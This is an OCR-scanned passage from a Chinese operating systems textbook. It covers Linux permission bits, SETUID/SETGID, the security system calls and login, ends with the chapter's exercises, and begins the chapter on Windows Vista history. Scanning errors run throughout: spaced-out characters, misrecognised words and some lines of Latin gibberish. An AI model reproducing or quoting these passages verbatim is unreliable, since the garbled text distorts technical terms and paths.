其 内 容 ， 而 其 他 用 户 没 有 任何 权限 。 第 四 行 通 党 用 于 所 有 考 想 要 公开 
的 数据 文件 。 类 似 地 ， 第 五 行 通常 用 于 所 有 者 想 要 公开 的 程序 。 第 六 
行 剥 村 了 所 有 用 户 的 任何 权利 。 这 种 模式 有 时 用 于 伪 文 件 来 实现 相互 
排斥 ， 因 为 想 要 创建 一 个 同名 的 文件 的 任何 行为 都 将 失败 。 如 果 多 个 
进程 同时 想 要 创建 这 样 一 个 文件 作为 锁 ， 那 么 只 有 一 个 能 够 创建 成 


功 。 最 后 一 个 例子 相当 奇怪 ， 因 为 它 给 组 以 外 其 他 用 户 更 多 的 权限 。 
但 是 ， 它 的 存在 是 符合 保护 规则 的 。 笠 运 的 征 ， 尽 管 没 有 任何 文件 访 
问 权 限 ， 但 是 所 有 着 可 以 随后 改变 保护 模式 。 


UID 为 0 的 用 户 是 一 个 特殊 用 户 ， 称 为 超级 用 户 (或 者 根 用 户 ) 。 
超级 用 户 能 够 读 和 写 系统 中 的 任何 文件 ， 不 论 这 个 文件 为 谁 所 有 ， 也 
不 论 这 个 文件 的 保护 模式 如 何 。UID 为 0 的 进程 拥有 调用 一 小 部 分 受 保 
护 的 系统 调用 的 权限 ， 而 普通 用 户 是 不 能 调用 这 些 系统 调用 的 。 一 般 
而 言 ， 只 有 系统 管理 员 知 道 超级 用 户 的 密码 ， 但 是 很 多 学 生 夺 找 系统 
安全 漏洞 想 让 自己 能 够 不 用 密码 就 可 以 以 超级 用 户 的 身份 登录 ， 并 且 
认为 这 是 一 种 了 不 起 的 行为 。 管 理 人 员 往 往 对 这 种 行为 很 不 满 。 


目录 也 是 一 种 文件 ， 并 且 具 有 普通 文件 一 样 的 保护 模式 。 不 同 的 
征 ， 目 孙 的 x 比 特 位 表示 查找 权限 而 不 是 执行 权限 。 因 此 ， 如 有 果 一 个 目 
了 永 具 有 你 护 模式 rwxrxrx， 那 么 它 允 许 所 有 着 读 、 写 和 得 找 目 永 ， 但 是 
其 他 人 只 可 以 读 和 查找 ， 而 不 允许 从 中 添加 或 者 删除 文件 。 


与 IO 相关 的 特殊 文件 拥有 与 普通 文件 一 样 的 保护 位 。 这 种 机 制 可 
以 用 来 限制 对 MO 设备 的 访问 权限 。 例 如 ， 假 设 打印 机 特殊 文 
件 ，/dewlp， 可 以 被 根 用 户 或 者 一 个 叫 守 护 进程 的 特殊 用 户 拥 有 ， 具 有 
保护 模式 rw------- ， 从 而 阻止 其 他 所 有 人 对 打印 机 的 访问 权限 。 毕 竞 ， 
如 采 每 个 人 都 可 以 任意 使 用 打印 机 ， 那 么 就 会 发 生 混 乱 。 


当然 ， 让 /dev/lp 被 守护 进程 以 保护 模式 rw------- 拥 有 ， 意 味 着 其 他 
任何 人 痢 不 可 以 使 用 打印 机 ， 但 十 这 种 做 法 限制 了 很 多 合法 的 打印 要 
求 。 事 实 上 ， 人 允许 对 IO 设备 及 其 他 系统 资源 进行 受 探访 问 的 做 法 具有 


一 个 更 普遍 的 问题 。 


这 个 问题 通过 增加 一 个 保护 位 SETUID 到 之 前 的 9 个 比特 位 来 解 
决 。 当 一 个 进程 的 SETUID 位 打开 ， 它 的 有 效 UID 将 变 成 相应 可 执行 文 
件 的 所 有 者 的 UID ， 而 不 是 当前 使 用 该 进程 的 用 户 的 UID。 当 一 个 进程 
试图 打开 一 个 文件 时 ， 系 统 检查 的 将 是 它 的 有 效 UID， 而 不 是 真正 的 
UID。 将 访问 打印 机 的 程序 设置 为 被 守护 进程 所 有 ， 同 时 打开 SETUID 
位 ， 这 样 任何 用 户 都 可 以 执行 该 程序 ， 并 拥有 守护 进程 的 权限 (例如 
访问 /dep/lp) ， 但 是 这 仅 限 于 运行 该 程序 〈 例 如 给 打印 任务 排序 ) 。 


许多 敏感 的 Linux 程 序 被 根 用 户 所 有 ， 但 是 打开 它们 的 SETUID 
位 。 例 如 ， 人 允许 用 户 改 变 密码 的 程序 需要 写 password 文 件 。 人 允许 
password 文 件 公 开 可 写 显 然 不 是 个 好 主意 。 解 决 的 方法 是 ， 提 供 一 个 被 
根 用 户 所 有 同时 SETUID 位 打开 的 程序 。 虽 然 该 程序 拥有 对 password 文 
件 的 全 部 权限 ， 但 是 它 仅 仅 改 变调 用 该 程序 的 用 户 的 密码 ， 而 不 允许 
其 他 任何 的 访问 权限 。 


除了 SETUID 位 ， 还 有 一 个 SETGID 位 ， 工 作 原 理 同 SETUID 类 似 。 
它 和 暂时 性 地 给 用 户 该 程序 的 有 效 GID。 然 而 在 实践 中 ， 这 个 位 很 少 用 
到 。 


10.7.2 Linux 中 安全 相关 的 系统 调用 


只 有 为 数 不 多 的 几 个 安全 性 相关 的 系统 调用 。 其 中 最 重要 的 儿 个 
在 图 10-38 中 列 出 。 最 常用 到 的 安全 相关 的 系统 调用 是 chmod。 它 用 来 
改变 保护 模式 。 例 如 : 


s=chmod("/usr/ast/newgame",0755); 


它 把 newgame 文 件 的 保护 模式 修改 为 rwxr-xrXx， 这 样 任何 人 都 可 以 
运行 该 程序 《0755 是 一 个 八进制 常数 ， 这 样 表示 很 方便 ， 因 为 保护 位 
每 三 个 分 为 一 组 ) 。 只 有 该 文件 的 所 有 者 和 超级 用 户 才 有 权利 改变 保 
护 模 陈 。 


系统 调用 
s = chmod(path, mode) 


改变 文件 的 保护 模式 
使 用 真实 的 UID 和 GID 测 试 访问 权限 
获取 真实 的 UID 
获取 有 效 UID 
获取 真实 的 GID | 
获取 有 效 GID 

改变 所 有 者 和 组 
设置 UID 
设置 GID 


s = access(path, mode) 

uid = getuid( ) 

uid = geteuid( ) 

gid = getgid( ) 

gid = getegid( ) 

s = chown(path, owner, group) 
s = setuid(uid) 
s = setgid(gid) 


图 10-38 一 些 与 安全 相关 的 系统 调用 。 当 错误 发 生 时 ， 返 回 值 
为 -1; uid 和 gid 分 别 是 UID 和 GID。 参数 的 意思 不 言 自明 


access 系 统 调用 检验 用 实际 的 UID 和 GID 对 某 文件 是 否 拥 有 特定 的 
权限 。 对 于 根 用 户 所 拥有 的 并 设置 了 SETUID 的 程序 ， 我 们 需要 这 个 系 
统 调用 来 避免 安全 违例 。 这 样 的 程序 可 以 做 任何 事情 ， 有 时 需要 这 样 
的 程序 判断 是 否 允 许 用 户 执行 某 种 访问 。 让 程序 通过 访问 判断 显然 是 
不 行 的 ， 因 为 这 样 的 访问 总 能 成 功 。 使 用 access 系 统 调用 ， 程 序 就 能 知 
道 用 实际 的 UID 和 GID 有 是 否 能 够 以 一 定 的 权限 访问 文件 。 


接 下 来 的 四 个 系统 调用 返回 实际 的 和 有 效 的 UID 和 GID。 最 后 的 三 
个 只 能 够 被 超级 用 户 使 用 ， 它 们 改变 文件 的 所 有 者 以 及 进程 的 UID 和 
GID ° 


10.7.3 Linux 中 的 安全 实现 


当 用 户 登 录 的 时 候 ， 登 录 程 序 login (为 根 用 户 所 有 且 SETUID 打 
开 ) 要 求 输入 登录 名 和 密码 。 它 首先 计算 密码 的 散 列 值 ， 然 后 
在 /etc/passwd 文 件 中 查找 ， 看 是 否 有 相 匹 配 的 项 (网 络 系统 工作 得 稍 
有 不 同 ) 。 使 用 散 列 的 原因 是 防止 密码 在 系统 中 以 非 加 密 的 方式 存 
在 。 如 果 密 码 正 确 ， 登 录 程序 在 /etc/passwd 中 读 取 该 用 户 选 择 的 shell 
程序 的 名 称 ， 例 如 可 能 是 bash， 但 是 也 有 可 能 是 其 他 的 shell， 例 如 csh 
或 者 ksh。 然 后 登录 程序 使 用 setuid 和 setgid 来 使 自己 的 UID 和 GID 变 成 
用 户 的 UID 和 GID 〈 注 意 ， 它 一 开始 的 时 候 是 根 用 户 所 有 且 SETUID 打 
F) 。 人 然后 它 打开 键盘 作为 标准 输入 (文件 描述 符 0) ， 屏 幕 为 标准 输 
出 (文件 描述 符 1) ， 屏 幕 为 标准 错误 输出 (文件 描述 符 2) 。 最 后 ， 
执行 用 户 选 择 的 shell 程 序 ， 因 此 终止 自己 。 


到 这 里 ， 用 户 选 择 的 shell 已 经 在 运行 ， 并 且 被 设置 了 正确 的 UID 
和 GID， 标 准 输入 、 标 准 输 出 和 标准 错误 输出 都 被 设置 成 了 默认 值 。 
它 创 建 任何 子 进程 (也 就 是 用 户 输入 的 命令 ) 都 将 自动 继承 shell 的 
UID 和 GID， 所 以 它们 将 拥有 正确 的 UID 和 GID， 这 些 进 程 创建 的 任何 
文件 也 具有 这 些 值 。 


SEAR ETT ITP OE, ASTRO CAT TIO 
保护 位 与 用 户 的 有 效 UID 和 有 效 GID 对 比 ， 来 检查 访问 是 否 被 允许 。 
如 村 人 允许 访问 ， 融 打开 文件 并 且 返 回 文 件 朱 述 符 ; 否则 不 打开 文件 ， 
返回 -1。 在 接 下 来 的 read 和 write 中 不 再 检查 权限 。 因 此 ， 当 一 个 文件 
的 保护 模式 在 它 被 打开 后 修改 ， 新 模式 将 无 法 影响 已 经 打开 该 文件 的 
进程 。 


Linux 安 全 模型 及 其 实现 在 本 质 上 跟 其 他 大 多 数 传统 的 UNIX 系 统 
相同 。 


10.8 小结 


Linux 一 开始 是 一 个 开源 的 完全 复制 UNIX 的 系统 ， 而 今天 它 已 经 
广泛 应 用 于 各 种 系统 ， 从 笔记 本 到 超级 计算 机 。 它 有 三 种 主要 接口 : 
shell、C 函 数 库 和 系统 调用 。 此 外 ， 通 党 使 用 图 形 用 户 界面 以 和 消化 用 
户 与 系统 的 交互 。shell 允 许 用 户 输入 命令 来 执行 。 这 些 命令 可 能 是 简 
单 的 命令 、 管 线 或 者 复杂 的 命令 结构 。 输 入 和 输出 可 以 被 重 定向 。C 
函数 库 包括 了 系统 调用 和 许多 增强 的 调用 ， 例 如 用 于 格式 化 输出 的 
printf。 实 际 的 系统 调用 接口 是 依赖 于 体系 结构 的 ， 在 x86 平 台 上 大 约 
有 250 个 系统 调用 ， 每 个 系统 调用 做 需要 做 的 事情 ， 不 会 做 多 余 的 事 


T° 


Linux 中 的 关键 概念 包括 进程 、 内 存 模型 、VO 和 文件 系统 。 进 程 
可 以 创建 子 进 程 ， 形 成 一 棵 进程 树 。Linux 中 的 进程 管理 与 其 他 的 
UNIX 系 统 不 太一 样 ，Linux 系 统 把 每 一 个 执行 体 一 一 单线 程 进程 ， 或 
者 多 线程 进程 中 的 每 一 个 线程 或 者 内 核 一 一 看 做 不 同 的 任务 。 一 个 进 
程 ， 或 者 统称 为 一 个 任务 ， 通 过 两 个 关键 的 部 分 来 表示 ， 即 任务 结构 
和 描述 用 户 地 址 空间 的 附加 信息 。 前 者 利 驻 内 存 ， 后 者 可 能 被 换 出 内 
存 。 进 程 创 建 古 通过 复制 父 进 程 的 任务 结构 ， 然 后 将 内 存 映像 信息 设 
置 为 指向 父 进 程 的 内 存 上 映像。 内 存 映 像 页 面 的 真正 复制 仅 当 在 共 至 不 


允许 和 需要 修改 内 存单 元 时 发 生 。 这 种 机 制 称 为 写 时 复制 。 进 程 调度 
采用 基于 优先 级 的 算法 ， 给 予 交互 式 进程 更 高 的 优先 级 。 


每 个 进程 的 内 存 模 型 由 三 个 部 分 组 成 :人 代码、 数据 和 堆栈 。 内 存 
管理 采用 分 页 式 。 一 个 彰 驻 内 存 的 表 跟 踩 每 一 页 的 状态 ， 页 面 守 护 进 
程 采用 一 种 修改 过 的 双 指 针 时 钟 算法 保证 系统 有 足够 多 的 空闲 页 。 


可 以 通过 特殊 文件 访问 MO 设备 ， 每 个 设备 都 有 一 个 主 设备 号 和 次 
设备 号 。 块 设备 IO 使 用 内 存 缓存 磁盘 块 ， 以 减少 访问 磁盘 的 次 数 。 字 
符 IMO 可 以 工作 在 原始 模式 ， 或 者 字符 流 可 以 通过 行规 则 加 以 修改 。 网 
络 设备 稍 有 不 同 ， 它 关联 了 整个 网 络 协议 模块 来 处 理 网 络 数据 包 流 。 


文件 系统 由 文件 和 目录 所 组 成 的 层次 结构 组 成 。 所 有 人 磁盘 都 挂 载 
到 一 个 有 惟一 根 的 目录 树 中 。 文 件 可 以 从 文件 系统 的 其 他 地 方 连接 到 
—SASR Eo BEA MH, BCE AM, Bare Pha 
符 用 于 接 下 来 的 读 和 写 。 文 件 系统 内 部 主要 使 用 三 种 表 : 文件 描述 符 
表 、 打 开 文 件 摘 述 表 和 iT 点 表 。 其 中 iT 点 表 是 最 重要 的 表 ， 包 含 了 
文件 管理 所 需要 的 所 有 信息 和 文件 位 置信 息 。 目 录 和 设备 ， 以 及 其 他 
特殊 文件 也 都 表示 为 文件 。 


保护 基于 对 所 有 者 、 同 组 用 户 和 其 他 人 的 读 、 写 和 执行 的 访问 控 
制 。 对 目 孙 而 言 ， 执 行 位 指示 和 是否 允许 搜索 。 


习题 


TERESA FEF: 


aardvark feret koala porpoise unicorn 
bonefish grunion llama quacker vicuna 
capybara hyena marmot rabbit weasel 
dingo ibex nuthatch seahorse yak 
emu jellyfish ostrich tuna zebu 


哪些 文件 能 通过 命令 ls[abc]*e* 被 罗列 出 来 ? 
2. 下 面 的 Linux shell 管 线 的 功能 是 什么 ? 


grep nd xyz|wc- | 


3. 写 一 个 能 够 在 标准 输出 上 打印 文件 z 的 第 八 行 的 Linux 管 线 。 


4.Linux 在 标准 输出 和 标准 错误 对 于 终端 都 是 于 认 的 情况 下 是 怎么 


区 分 标准 输出 和 标准 错误 的 ? 


5. 一 个 用 户 在 终端 键入 了 如 下 的 命令 


alb|c& 
dje|t& 


在 shell 处 理 完 这 些 命令 后 ， 有 多 少 新 的 进程 在 运行 ? 


6. 当 Linux shell 局 动 一 个 进程 ， 它 把 它 的 环境 变量 ， 如 HOME 放 到 
进程 栈 中 ， 使 得 进程 可 以 找到 它 的 home 目 录 古 哪个 。 如 琳 这 个 进程 之 
后 进行 派生 ， 那 么 它 的 子 进 程 也 能 目 动 地 得 到 这 些 变量 吗 ? 


7. 在 如 下 的 条 件 下 : 文本 大 小 =100KB， 数 据 大 小 =20KB， 栈 大 小 
=10KB， 任 务 结构 =1KB， 用 户 结构 =5KB， 一 个 传统 的 UINX 系 统 要 花 
多 长 时 间 派 生 一 个 子 进程 ? 内 核 陷 阱 和 返回 的 时 间 用 lms， 机 器 每 
50ns 就 可 以 复制 一 个 32 位 的 字 。 共 享 文本 段 ， 但 是 不 共享 数据 段 和 堆 
栈 段 。 


8. 当 多 兆 字 节 程序 变 得 越 来 越 普 迄 ， 人 花 在 执行 fork 系 统 调 用 以 及 复 
制 调 用 进程 的 数据 段 和 堆栈 段 的 时 间 也 成 比例 地 增长 。 当 在 Linux 中 执 
行 fork， 父 进程 的 地 址 空间 是 没有 被 复制 的 ， 不 像 传 统 的 fork 语 义 那 
样 。Linux 古 怎样 防止 子 进程 做 一 些 会 彻 属 改变 fork 语 义 的 行动 的 ? 


9. 当 一 个 进程 进入 伪 死 状态 后 ， 取 走 它 的 内 存 有 意义 吗 ? 为 什 
L? 


10. 你 认为 为 什么 Linux 的 设计 者 禁止 一 个 进程 向 不 属于 它 的 进程 
组 的 男 一 个 进程 发 信号 呢 ? 


11 — Th ARS A CB) 指令 实现 。 一 个 普通 
的 过 程 调用 在 Pentium 的 硬件 上 也 能 使 用 吗 ? 如 有 果 能 使 用 ， 在 哪 种 条 件 
下 ? 如何 使 用 ? 如 果 不 能 ， 请 说 明 原 因 。 


12. 通 常情 况 下 ， 你 认为 守护 进程 比 交 互 进程 具有 更 高 的 优先 级 还 
是 更 低 的 优先 级 ? 为 什么 ? 


13. 当 一 个 新 进程 被 创建 ， 它 一 定 会 被 分 配 一 个 惟一 的 整 型 数 作为 
它 的 PID。 在 内 核 里 有 一 个 每 个 进程 创建 时 就 递增 的 计数 紫 够 用 么 ? 
其 中 计数 器 作为 新 的 PID。 讨 论 你 的 结论 。 


14. 在 每 个 任务 结构 中 的 进程 项 中 ， 父 进程 的 PID 被 储存 。 为 什 
L? 


15. 当 啊 应 一 个 传统 的 UNIX fork 调 用 时 ，Linux 的 clone 命 令 会 使 用 
什么 样 的 sharing_flags 位 的 组 合 ? 


16.Linux 调 度 器 在 2.4 版 本 和 2.6 版 本 的 内 核 间 经 历 了 一 个 大 整修 。 
现在 的 调度 万 可 以 在 O(D 时 间 做 出 调度 决定 。 请 解释 为 什么 会 这 样 ? 


17. 当 引导 Linux (或 者 大 多 数 其 他 操作 系统 在 引导 时 ) 时 ， 在 0 号 
鹿 区 的 引导 加 载 程序 首 移 加载 一 个 引导 程序 ， 这 个 程序 之 后 会 加 载 操 
作 系 统 。 这 多 余 的 一 步 为 什么 是 必 不 可 少 的 ? OF bi RAYS SEE AY 
直接 加 载 操 作 系统 会 更 简单 的 。 


18. 某 个 编辑 器 有 100KB 的 程序 文本 ，30KB 的 初始 化 数据 和 50KB 
的 BSS。 初 始 堆栈 是 1OKB。 假 设 这 个 编辑 器 的 三 个 复制 是 同时 开始 
的 。 (a) 如 果 使 用 共享 文本 ， 需 要 多 少 物理 内 存 呢 ? b) 如 果 不 使 
用 共享 文本 又 需 多 少 物 理 内 存 呢 ? 


19. 在 Linux 中 打开 文件 描述 符 表 为 什么 是 必要 的 呢 ? 


20. 在 Linux 中 ， 数 据 段 和 堆栈 段 被 分 页 并 交换 到 一 个 特别 的 分 
磁盘 或 分 区 的 暂时 副本 上 ， 但 是 代码 段 却 使 用 了 可 执行 二 进 制 文件 
为 什么 ? 


21. 摘 述 一 种 使 用 mmap 和 信和 号 量 来 构造 一 个 进程 内 部 间 通 信 机 制 
的 方法 。 


22. 一 个 文件 使 用 如 下 的 mmap 系 统 调 用 映射 : 


mmap (65536, 32768, READ, FLAGS, fd, 0) 


每 页 有 8KB“。 当 在 内 存 地 址 72000 处 读 一 个 字 节 时 ， 访 问 的 是 文件 


中 的 哪个 字 节 ? 


23. 在 前 一 个 问题 的 系统 调用 执行 后 ， 执 行 munmap(65535,8192) 调 
会 成 功 吗 ?如 果 成 功 ， 文 件 的 哪些 字 节 会 保持 映射 ? 如 果 不 成 功 ， 
为 什么 会 失败 ? 


24. 一 个 页 面 故障 会 导致 错误 进程 终止 吗 ? 如 果 会 ， 举 一 个 例子 。 
如 果 不 会 ， 请 解释 原因 。 


25. 在 内 存 管理 的 伙伴 系统 中 ， 两 个 相 邻 的 同样 大 小 的 空 几 内 存 块 
有 没有 可 能 同时 存在 而 不 会 被 合并 到 一 个 块 中 ? 如 果 有 解释 是 怎么 样 
的 情况 。 如 果 没 有 可 能 ， 说 明 为 什么 不 可 能 。 


26. 据 说 在 代码 段 中 分 页 分 区 要 比分 页 文件 性 能 更 好 。 为 什么 呢 ? 
27. 举 两 个 例子 说 明 相 对 路 径 名 比 绝对 路 径 名 有 优势 。 


28. 以 下 的 加 锁 调 用 是 由 一 个 进程 集合 产生 的 ， 对 于 每 个 调用 ， 说 
明 会 发 生 什么 事情 。 如 果 一 个 进程 没 能 够 得 到 锁 ， 它 就 被 阻塞 。 


a)A 想 要 0 到 10 字 市 处 的 一 把 共享 锁 。 
b)B 想 要 20 到 30 字 节 处 的 一 把 互 不 锁 。 
QC 想 要 8 到 40 字 节 处 的 一 把 共享 锁 。 
dA 想 要 25 到 35 字 下 处 的 一 把 共 吾 锁 。 
eB 想 要 8 字 节 处 的 一 把 互 斥 锁 。 


29. 考 虑 图 10-26c 中 的 加 锁 文件 。 假 设 一 个 进程 尝试 对 10 和 11 字 广 


和 11 字 市 加 锁 然 后 阻塞 。 在 这 种 情况 下 语义 方面 会 产生 什么 问题 ? $e 
出 两 种 解决 方法 并 证 明 。 

30. 假 设 lseek 系 统 调 用 在 一 个 文件 中 寻找 一 个 负 的 偏 移 量 。 给 出 两 
种 可 能 的 处 理 方法 。 


31. 如 果 一 个 Linux 文 件 拥有 保护 模式 755 (八进制 ) ， 文 件 所 有 
者 、 所 有 者 所 在 组 以 及 其 他 每 个 用 户 都 能 对 这 个 文件 做 什么 ? 


32 一 些 磁带 驱动 拥有 编号 的 块 ， 能 够 在 原 地 重 写 一 个 特定 块 同时 
不 会 影响 它 之 前 和 之 后 的 块 。 这 样 一 个 设备 能 持 有 一 个 已 加 载 的 Linux 
文件 系统 中? 


33. 在 图 10-24 中 链接 之 后 Fred 和 Lisa 在 他 们 各 自 的 目录 中 都 能 够 访 
问 文 件 x。 这 个 访问 是 完全 对 称 的 吗 ， 也 就 是 说 其 中 一 个 人 能 对 文件 做 
的 事情 另 一 个 人 也 可 以 做 ? 


34. 正 如 我 们 看 到 的 ， 绝 对 路 径 名 从 根 目录 开始 查找 ， 而 相对 路 径 
名 从 工作 目录 开始 查找 。 提 供 一 种 有 效 的 方法 实现 这 两 种 查找 。 


35. 当 文件 /usr/ast/work/f 被 打开 ， 读 i 太 点 和 有 目 好 块 时 需要 一 些 人 磁盘 
访问 。 在 根 节点 的 i 太 点 始终 在 内 存 中 以 及 所 有 的 目录 都 是 一 个 块 的 大 
小 这 样 的 假设 下 计算 需要 的 磁盘 访问 数量 。 


36. 一 个 Linux i 节 点 有 12 个 磁盘 地 址 放 数 据 块 ， 还 有 一 级 、 二 级 和 
三 级 间接 块 。 如 果 每 一 个 块 能 放 256 个 磁盘 地 址 ， 假 设 一 个 磁盘 块 的 大 
小 是 1KB， 能 处 理 的 最 大 文件 的 大 小 是 多 少 ? 


37. 在 打开 文件 的 过 程 中 ，i 市 点 从 磁 副 中 被 读 出 ， 然 后 放 入 内 存 中 
的 i 点 表 里 。 这 个 表 中 有 些 域 在 磁盘 中 没有 。 其 中 一 个 是 计数 右 ， 用 
来 记录 i 节 太 已 经 锐 打 开 的 次 数 。 为 什么 需要 这 个 域 ? 


38. 在 多 CPU 平台 上 ，Linux 为 每 个 CPU 维护 一 个 runqueue。 这 是 个 
好 想法 吗 ? 请 解释 你 的 答案 。 


39.pdflush 线 程 可 以 被 周期 性 地 唤醒 ， 把 多 于 30 秒 的 旧 页 面 写 回 到 
磁盘 。 这 个 为 什么 是 必要 的 ? 


40. 在 系统 月 江 并 重启 后 ， 通 凋 一 个 恢复 程序 将 运行 。 假 设 这 个 程 
序 发 现 一 个 磁盘 i 节点 的 连接 数 是 2， 但 是 只 有 一 个 目录 项 引用 了 这 个 i 


市 态 。 它 能 够 解决 这 个 问题 吗 ? 如 果 能 ， 该 怎么 做 ? 


41. 猜 一 下 哪个 Linux 系 统 调 用 是 最 快 的 ? 
42. 对 一 个 从 来 没有 被 连接 的 文件 取消 连接 可 能 吗 ? 会 发 生 什么 ? 


43. 基 于 本 章 提 供 的 信息 ， 如 果 一 个 Linux ext2 文 件 系 统 放 在 一 个 
1.44MB 的 软盘 上 ， 用 户 文件 数据 最 大 能 有 多 少 可 以 储存 在 这 个 盘 上 ? 
假设 磁盘 块 的 大 小 是 IKB 。 


44. 考 虚 到 如 果 学 生成 为 超级 用 户 会 造成 的 所 有 麻烦 ， 为 什么 这 个 
概念 还 会 出 现 ? 


45. 一 个 教授 通过 把 文件 放 在 计算 机 科学 学 院 的 Linux 系 统 中 的 一 
个 公共 可 访问 的 目录 下 来 与 他 的 学 生 共 至 文件 。 一 天 他 意识 到 前 一 天 
放 在 那 的 一 个 文件 变 成 全 局 可 写 的 了 。 他 改变 了 权限 并 验证 了 这 个 文 
件 与 他 的 原件 是 一 样 的 。 第 二 天 他 发 现 文件 已 经 被 修改 了 。 这 种 情况 
为 什么 会 发 生 ， 又 如 何 能 预防 呢 ? 


46.Linux 支 持 一 个 系统 调用 fsuid。setuid 准 许 使 用 者 拥有 与 他 运行 
的 程序 相关 的 有 效 id 的 所 有 权利 。 与 setuid 不 同 ，fsuid 准 许 正在 运行 程 
序 的 使 用 者 拥有 特殊 的 权利 ， 只 能 够 访问 文件 。 这 个 特性 为 什么 有 
用 ? 


47. 写 一 个 允许 简单 命令 执行 的 最 小 的 shell， 也 要 使 这 些 命令 能 在 
后 台 执行 。 


48. 使 用 汇编 语言 和 BIOS 调 用 ， 写 一 个 在 Pentinum 类 计算 机 上 从 软 
盘 上 引导 目 己 的 程序 。 这 个 程序 应 该 使 用 BIOS 调 用 来 读 取 键盘 以 及 回 
应 键入 的 字符 ， 只 是 证 明 这 个 程序 确实 在 运行 。 


49. 写 一 个 能 通过 串口 连接 两 台 Linux 计 算 机 的 呈 (dumb) FEFE 
序 。 使 用 POSIX 终 端 管理 调用 来 配置 端口 。 


50.5 — Th PAR a Be, ep Be ol ee 
一 个 大 文件 。 使 用 共享 内 存 的 方法 重 狐 实 现 相 同 的 应 用 程序 。 你 觉得 
哪个 版 本 性 能 更 好 ? 为 什么 ? 使 用 你 写 好 的 代码 和 不 同 的 文件 大 小 进 
行 性 能 的 测量 。 你 观察 到 了 什么 ? 你 认为 在 Linux 内 核 中 发 生 了 什么 导 
致 这 样 的 行为 ? 


51. 实 现 一 个 基本 的 用 户 级 线程 库 ， 该 线程 在 Linux 的 上 层 运行 。 
库 的 API 应 该 包含 画 数 调用 ， 如 mythreads_init、mythreads_create、 
mythreads_join、mythreads_exit、mythreads_yield、mythreads_self， 可 
能 还 有 一 些 其 他 的 。 进 一 步 实 现 这 些 同步 变量 ， 以 便 用 户 能 使 用 安全 
的 并 发 操作 : mythreads_mutex_init, mythreads_mutex_lock, 
mythreads_mutex_unlock。 在 开始 前 ， 清 晰 地 定义 API 并 说 明 每 个 调用 
的 语义 。 接 着 使 用 简单 的 轮转 抢占 调度 器 实现 用 户 级 的 库 。 还 需要 利 
用 该 库 编 写 一 个 或 更 多 的 多 线程 应 用 程序 ， 用 来 测试 线程 库 。 最 后 ， 
用 另 一 个 像 本 章 描述 的 Linux2.6 O() 的 调度 策略 替换 简单 的 调度 策 
略 。 使 用 每 种 调度 器 时 比较 你 的 应 用 程序 的 性 能 。 


第 11 草 ”实例 研究 2: Windows Vista 


Windows 是 一 个 现代 的 操作 系统 ， 可 以 运行 在 消费 型 或 商业 型 桌面 
计算 机 和 企业 服务 器 上 。 最 新 的 桌面 版 本 是 Windows Vista e Windows 
Vista 的 服务 器 版 本 称 为 Windows Server 2008。 在 本 章 中 我 们 将 分 析 
Windows Vista 的 各 个 方面 ， 从 历史 简 述 开始 ， 然 后 接 下 来 是 系统 的 染 
构 。 在 此 之 后 我 们 将 看 看 进程 、 内 存 管理 、 绥 存 、 输 入 /输出 、 文 件 系 
统 ， 最 终 我 们 还 将 关注 一 下 安全 。 


11.1 Windows Vista 的 历史 


微软 公司 为 桌面 计算 机 和 服务 器 开发 的 Windows 操 作 系 统 可 以 划分 
为 三 个 时 代 : MS-DOS、 基 于 MS-DOS 的 Windows 和 基于 NT 的 
Windows。 从 技术 上 来 说 ， 以 上 的 每 一 种 系统 与 其 他 系统 都 有 本 质 的 不 
同 。 在 个 人 计算 机 历史 中 不 同 的 时 代 ， 每 一 种 系统 都 占据 了 主导 地 
位 。 图 11-1 显 示 的 是 微软 适用 于 桌面 计算 机 的 主要 操作 系统 的 发 布 日 期 
(不 包括 微软 为 UNIX 使 用 的 Xenix 版 本 ， 被 微软 于 1987 年 出 售 给 
SCO) 。 以 下 我 们 简要 描述 表 中 显示 出 的 每 个 时 代 。 


[sr [wsposio | | o [om 

vp | | nr | 

isa ws-poss0 |i Ta | 

01| | Wriow30 A 
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I I RT | 
Win Me FN Win 
E —— | $= a 


图 11-1 微软 加 面 PC 的 主要 操作 系统 的 发 布 日 期 


11.1.1 20 世纪 80 年 代 : MS-DOS 


20 世 纪 80 初 期 的 IBM， 是 那 时 世界 上 最 大 和 最 强 的 计算 机 公司 ， 
开发 出 基于 Intel 8088 微 处 理 器 的 个 人 计算 机 。 目 从 1970 年 中 期 开始 ， 
微软 成 为 在 8080 和 Z-80 等 8 位 微 处 理 侣 上 提供 BASIC 编 程 语言 的 领导 
者 。 当 IBM 接 洽 微软 关于 在 新 型 的 计算 机 上 授权 使 用 BASIC 的 时 候 ， 微 
软 赞 同 并 且 建 议 IBM 联 系 Digital Research 公 司 以 便于 使 用 它 的 CP/M 操 
作 系 统 ， 那 时 微软 还 没有 进入 操作 系统 领域 。IBM 这 样 做 了 ， 但 是 
Digital Research 公 司 的 总 裁 Gary Kildall A IC, BORA Te] SIBMARES 
商讨 ， 所 以 IBM 转 回 到 微软 。 在 很 短 的 时 间 之 内 ， 微 软 从 一 家 本 地 公 
司 西雅图 计算 机 产品 (Seatle Computer Products) 买 到 了 一 份 CP/M 的 拷 
贝 ， 移 植 到 IBM PC 中 ， 并 且 授 权 IBM 使 用 。 这 个 产品 被 命名 为 MS- 


DOS 1.0 (Microsoft Disk Operating System) 并 且 在 1981 年 与 第 一 款 
IBM PC 一 同 发 售 。 


MS-DOS 是 一 款 16 位 、 实 时 模式 、 单 一 用 户 、 命 令 行 式 的 操作 系 
统 ， 包 含 8KB 的 内 存 驻 留 编码 。 在 接 下 来 的 十 年 里 ，PC 和 MS-DOS 继 
续 发 展 ， 增 加 了 更 多 的 特性 和 性 能 。 在 1986 年 当 IBM 基 于 Intel 286 开 始 
设计 PC/AT 时 ，MS-DOS 已 经 增长 到 36KB， 但 是 仍然 是 命令 行 式 ， 同 
一 时 刻 只 能 运行 一 个 应 用 程序 的 操作 系统 。 


11.1.2 20 世纪 90 年 代 : 基于 MS-DOS 的 Windows 


由 于 受到 了 斯 坦 福 研 究 学 院 和 Xerox PARC 研 究 的 图 形 用 户 界面 的 
启发 ， 以 及 他 们 取得 的 商业 产品 一 一 苹果 的 Lisa 和 Macintosh， 微 软 决 
定 增 加 MS-DOS 的 图 形 用 户 界面 ， 并 命名 为 Windows。Windows 最 初 的 
两 个 版 本 (1985 和 1987) 并 不 非常 成 功 ， 因 为 它们 受到 了 那 时 的 PC 便 
件 的 限制 。 在 1990 年 微软 为 Intel 386 发 布 了 Windows 3.0 版 本 ， 并 且 在 
六 个 月 内 销售 了 一 百 万 份 拷贝 。 


